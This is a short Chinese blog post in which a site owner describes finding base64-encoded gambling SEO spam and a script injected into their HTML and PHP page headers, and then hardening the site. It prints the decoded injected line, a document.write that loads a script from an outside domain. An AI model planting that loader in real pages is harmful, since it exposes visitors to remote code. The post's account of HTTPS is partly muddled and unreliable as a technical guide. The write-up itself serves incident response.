不清楚攻击者是通过哪种渠道修改我的html和php文件,然后在header注入了如下图的代码,可笑的是竟然还加过密。
title解密出来的内容是,“怎么做北京赛车代理_PK10北京赛车代理_北京赛车高赔率代理_北京赛车代理。”(可耻)
keywords解密出来的内容是,“北京赛车pk10代理,北京赛车信誉平台,北京赛车pk10招代理,北京赛车pk计划,北京赛车代理盘,北京赛车官网,北京赛车高手交流群,北京赛车游戏,北京赛车代理群,北京pk10官网网址,北京赛车平台,北京赛车玩法,北京赛车pk10代理盘,北京赛车稳赚,北京赛车代理怎么做。”(很可耻)
description解密出来的内容是,“北京赛车pk10代理【cx88cp.com】多年专注于北京赛车开户,北京赛车代理,北京赛车合作,北京pk10开户,北京pk10代理,全天代理,为您提供全面的北京赛车代理服务。”(极度可耻)
以上都是通过base64加密处理过的,可以通过在线工具解密。
注入的script也是奇葩,通过工具解密出来的结果是
window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/cxc.js"></script>');这里我第一步把根目录html和php的权限都设置成只读状态,不允许修改。
第二步把原来的http协议升级到https,http和https有什么区别呢?
简单地说https在http和tcp之间添加了一个安全协议层(SSL或TSL),秘钥在客户端和服务器才有。https之所以比http安全,是因为他利用ssl/tls协议传输(包含证书,卸载,流量转发,负载均衡,页面适配,浏览器适配,refer传递等。)保障了传输过程的安全性。
注意http的端口号为80,https的端口号为443,具体的安装配置可以参考本站文章:阿里云http升级https协议二三事。